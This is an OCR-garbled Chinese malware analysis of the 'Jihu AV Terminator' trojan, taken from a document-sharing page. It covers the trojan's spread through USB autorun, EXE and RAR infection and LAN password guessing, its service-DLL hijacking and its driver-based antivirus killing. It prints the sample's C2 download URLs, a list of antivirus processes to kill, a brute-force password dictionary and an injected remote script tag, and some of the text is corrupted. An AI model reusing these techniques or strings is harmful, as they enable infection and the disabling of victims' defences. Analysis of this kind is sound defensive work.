极虎AV终结者详细分析_第1页
极虎AV终结者详细分析_第2页
极虎AV终结者详细分析_第3页
极虎AV终结者详细分析_第4页
极虎AV终结者详细分析_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、极虎av终结者详细分析 open=recycle. 645ff040-508 m 01b-9f08-00aa002f954e)setup.exe2010 年 06 月 14 f1 星 期一 15:52原始样本名称:setup.exe样本大小:243kbsha 值:e6fd82f5b0d4db6e08f1b6d73e55c9224e14e53e获取途径:优盘 f 的 recycle. 645ff040-5081-101b-9f08-00aa002f954e文件夹中。安全阁鉴定结果:病毒一命名为trojan.win32.killav.ao运行平台windows平台。分析人:安全阁阁主一、样木的主要

2、行为:替换系统服务关联程序,加载驱动对抗杀软,破坏安金模式、感染磁盘文件、感染共享文件、 利用局域网传播、利用移动设备传播、下载文件。二、此病毒的爆发方式:计算机病毒的爆发方式通常収决于该病毒的传播方式。此病毒的传播方式有三种:1、此病毒感染系统中或局域网中的exe sl件和压缩包中的exe文件,当耒感染病毒的用 八双击了受感染的exe文件,因为被感染,所以病毒代码首先拿到控制权,将创建一个 c:booter.exe文件,然后运行启动它,z后再把控制权交还给被感染的文件。这样病毒在此 用户计算机上爆发。2、此病毒将在移动设备(如:优盘)中写入病毒即ausun.inf文件,当未感染病毒的用户计

3、算机开启了移动设备的自动播放功能,并且在其计算机上使用了带毒的移动设备,而且是通 过双击操作打开的移动设备盘符,此时病毒利用windows白动播放功能将运行在移动设备 中的 recycle.645ff040-5081-101b-9f08-00aa002f954ejsetup.exe 文件。这样病毒此用户 计算机上爆发。3、此病毒在局域网中某台计算机上爆发后,将利用自身携带的密码字典尝试登录局域网的 小其他计算机,如果登录成功则将病毒样本上传到那台计算机中c盘,命名为 config.exe(c:config.exe),并且设置一个计划任务待上传样本3分钟后病离口动运 行,从而爆发。三、病毒爆发后

4、的主体行为如下:1、判断口身爆发的路径是不是移动设备,如果是则把该路径盘符打开。(这样做的冃的是: 因为移动设备利用自动播放autorun.inf功能可以达到双击盘符运行指定程序的目的,但是 这样每次双击盘符就只能运行autorun.inf 指定的程序,而不能再打开移动设备的盘符了。 这无疑会使用户起疑,所以病毒在运行的同吋帮助用户打开了盘符。又因为病毒的运行是悄 无声息的,所以给用户的感觉是双击盘符就打开了,从而不会怀疑自己中毒了。)2、尝试打开管道.pipe96dba249-e88e-4c47-98dc-e 18e6e,并且与之通信。(如果计算 机上已经运行冇此病毒,则会创建这个管道,与以

5、后运行的病毒进行通信)如果通信成功则 说明计算机中已经运行了该病毒,此吋则保存已运行的计算机病毒通过管道发送过来的服务 名。病毒在c盘下创建文件c:delinfo.bin,其中的内容是:4个字节的标志位(此标志位的 值取决于与管道通信是否成功,成功则标志位的值是1,否则是2。该标志位用于之后病毒 操作的判断),然示是病毒自身的完整路径。病毒创建这个文件的目的是为了告诉之后的病 毒自己的位置,然后把自己删掉。3、循环执行解密操作,解密样本中的字符串,毎次循环解密两次:一次解密的得到的是服 务名另一次解密得到的是服务对应的动态链接库名。如果完全循环完毕则最终得到的解密串如下:服务名有:appmgm

6、t.bits.fastuserswitchingcompatibility.wmdtnpmsn.xmlprov.eventsystem.ntmssvc.u pnphost.ssdpsrv.netman.nla.tapisrv.browser.ciyptsvc.helpsvc.remoteregistry.schedule(这 些 串 实 际 上 对 应 于 注 册 表 屮 hkey_local_machinesoftwaremicrosoftwindows ntcurrcntvcrsionsvchost 路径 下netsvcs类型的若干服务名称)动态链接库有:appmgmts.qmgr.shs

7、vcs.mspmsnsv.xm lprov.es.ntmssvc .upnphost.ssdpsr man.mswsock.tapisrv.browser.cryptsvc.pchsvc.regsvc.schedsvc(这些串实际上对应于以上服务所要加载的动态链接库的名字)在循环过程中,每得到一个服务名,则为先前进行管道通信吋得到的服务名进行比较,如果 -致则继续循环解密下一个,如果不一致则执行以下操作(这样判断以保证病毒不会重复运 行同一个服务,而是每次运行一个不同的服务):打开此服务,检测此服务状态是否运行,如果运行将其停止。关闭系统对该服务所对应动态 库的文件保护,然后把病毒自身文件的属

8、性修改为动态链接库,并替换此服务对应的动态库 为修改后的病毒口身文件。然后启动该服务从而运行病毒,最后把当前病毒进程结束。四、病毒被以服务的形式运行起来以后的行为如下:1、读取c:wdelinfo.bin >|«的内容,将其中指定的文件删除,然后删除cadelinfo.bin文件。2、在系统中捜索avp.cxc(卡巴)和bdagcnt.cxc(bitdcfcndcr)进程,如果找到则分配4000000h 大的空间内存,然后全部写入nop,并且执行,执行完毕在释放内存。(用此方法进行免杀)3、解密字符串,解密后先后得到如下字符串:c:windowswindowsupdata7.j

9、pggr4004http:/a.nba 1001 .com:6969/announce;http:/b.nba 1001 .com:6969/announce;http:/c.nba 1001 .com:6969/ announce;http:/cl.nba 1001 .com:6969/announce;http:/e.nba 1001 .com:6969/announce;:6969/announce;http:/g.nba 1001 .com:6969/announce;http:/h.nba 1001 .com:6969/announce;http:/i.nbal():6969/ann

10、ounce;http:/j .nba 1001 .com:6969/announce;up5.nba 1001-comdown/33.rarupkvmonxp.kxp.kvsrvxrexe.avp.exe.avp.exe.avp.exe.ravmond.exe.ravtask.exe.rsagent.exe. rsnetsv 匚 cxc.rstray.exc.scanfnn.cxc.ccente r.exc.kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui. e

11、xe.ekrn.exe.ccs vchst.exe.ccsvchstexe.ccsvchst.exe.mcagent.exe.mcmscsvc.exe.mcnasvc.exe.mcods.exe.mcproxy.exe.mcshield.exe.mcsysmon.cxc.mevsshki.cxc.mpfsrv.cxc.mcsacorc.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.a vcenter.exe.ufseagnt.exe.tmbmsrv.

12、exe.sfctlcom.exe.tmproxy.exe.360softmgrsvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe. vsserv.exe.mpsvc.exe.mpsvc l.exe.mpsvc2.exe.mpmon.exc.ast.cxc.360spccdld.cxc.360softmgrsvc.cxc.360tray.exe. 修 复 工 rt.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.z

13、hudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxtray.exe4、在临时目录屮禅放驱动文件forter.sys,并加载到内存。紧接着把驱动文件和为了加载驱 动而创建的注册表服务项删除。5、修改自身服务的启动方式为自启动。6、与驱动进行通倍,让驱动程序在注册表中设置镜像劫持项。劫持如下程序的运行:ccsvchst.cxc.mcagcnt.exc.mcmscsvc.cxc.mcnasvc.cxc.mcods.cxc.mcproxy.cxc.mcshicld.exe. mcsysmon.exe.mcvsshld.exe.mpfsrv.ex

14、e.mcsacore.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.a vcenter.exe.ufseagnt.exe.tmbmsrv.exe.sfctlcom.exe.tmproxy.exe.360softmgrsvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccente 匚 exe. vsserv.exe.mpsvc.exe.mpsvc 1 .exe.mpsvc2.exe.m

15、pmon.exe.ast.exe.360speedld.exe.360softmgrsvc.exe.360tray.exe 修 复 工 a.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxtray.exe7、与驱动通信,结束nj能存在的杀毒软件进程。被结束的进程有:kvmonxrkxp.kvsrvxrexe.avp.exe.avp.exe-avp.exe.ravmond.exe.ravtask

16、.exe.rsagent.exe. rsnetsv r.exe.rstray.exe.scanfrm.exe.ccente 匚 exe kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui. cxc.ckrn.cxc.ccs vchst.cxc.ccsvchst.cxc8、仓ij建线程反复启动ie,并且打jf h*p:/tj.nbal001 .net:7777/tj/mac.html网站,十秒钟后将 其关闭然后重新启动以此增加该网站的点击率。9、创建线程获得域名:“

17、www.3-0b6f-415d-b5c7-832f”的ip地址,笔者测试吋得到 *21 ”撚后在如 k url 下载:h*p:/21:8080/down/33.rar 文件并保存到 c:windowswindowsupdata7.jpgo 然 后将c:windowswindowsupdata7.jpg复制到临时冃录中,扩展名为.nls,文件名为一个 随机数。然后将此文件映射到内存。此文件中的内容是加密数据,将其解密。然后将其中的 部分数据在c:documeladminlocalsltemp路径卜先成一个可执行程序,名字是个 随机名。然后启动这个程序。

18、10、创建线程创建命名管道w.pipe96dba249-e88e-4c47-98dc-e18e6e,并且实吋对其进 行监听,检测是否又冇同类病毒被运行,如果冇则与z通信,发送自身的服务名过去。11删 除 如 下 注 册 表 项:hkey_local_machinesystemcurrentcontrolsetcontrolsafebootminimalhkey_local_machinesystemcurrentcontrolsetcontrolsafebootnetworko 从而破坏破坏安全模式。12、创建线程获得域名:“www.3-0b6f-415d-b5c7-832f”的ip地址,笔者

19、测试时得到”202.9&24.121”,然后在如下url下载:下 载http:/202.98.2421:8080/down/xx.rar文 件 并 保 存 到c:docume-ladminlocals-ltemp 路径卜名字随机,扩展名为.txt。读収文件内容,并且发送给驱动此文件的内容。然后将这个文件移动到如下路径: “c:windowssystcm32c_30279.nls”。13、解密字符串,先后得到如下串:administrator.guest.admin.root1234.password.6969.harlcy. 123456.golf.pussy.mustang.l 11

20、1 .shadow. 1313.fish.5150.7777.qwerty, baseball. 2112.1etmein.l 2345678.12345.ccc.adniin.5201314.qq523.1234567.123456789.654321.54321.11 l.oooooo.abc.pw .11111111.88888888.pass.passwd.database.abcd.abc 123.pass.sybase.l pute 匚 52o.supe 匚 123asd.0.ihavenopass.godblessyou.enable.xp.2002.2003.

21、2600.alpha. 110.111111.121212.123123.1234qwer. 123abc.007.a.aaa.patrick.pat.administrate i*.root.scx.god.*you.*.abc.test.test 123.temp.templ23. win.pc.asdf.pwd.qwer.yxcv.zxcv.home.xxx.owner.login.login.pw 123.love.my pc. my pc 123.admin 123.mypass.mypass 123.901100.<script type="text/javascr

22、ipth src=,http:/web.nbalo():8888/tj/tongji.js"></script>.14>修改host文件屏蔽如下网站:antivir-antivir-pe.desunbelt-.free-15、判断hc:program fileswinrarrar.exe*'文件是否存在,如果存在保存路径。16、创建线程,循坏遍历所有驱动器,但排除a盘和b盘和光驱,遍历这些驱动器卜的所 有文件和文件夹,但是跳过c盘下的如下文件夹:"windows"“winnt “"documents and setting

23、s"nsystem volume information"“recycler”"common files""complus applications""installshield installation information"h internet explorer""messenger""microsoft frontpage"“movie maker*1“msn gaming zone”hnetmeetingh"outlook express*1&q

24、uot;windows media player"''windows nt""windowsupdate"“winrar”“thunder""thunder network"判断文件类型: 如果是exe,则在末尾添加一个节,节名为“.tc”,然后把病毒代码写到新添加的节数据区 中,修改入口地址是病毒首先获得控制权。如果是hg、hunl、asp、aspx判断是否已经感染,没感染的则在末尾写如下感染代码:<script type="text/javascript" src=":8888/tj/tongji.js"></script>.如果是rar,现将压缩包里的文件解压到临吋文件夹,然后感染,感染后在压缩回去,并把临 时文件夹删除掉。17、创建线程:循环查找移动设备,如來找到检测其中是否存在autorun.inf文件夹,如果 存在将其重命名为一个随即名。然后创建autorun.inf文件,内容如下。autorunopen=recycle. 645ff040-5081-101 b-9f08-00aa00

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论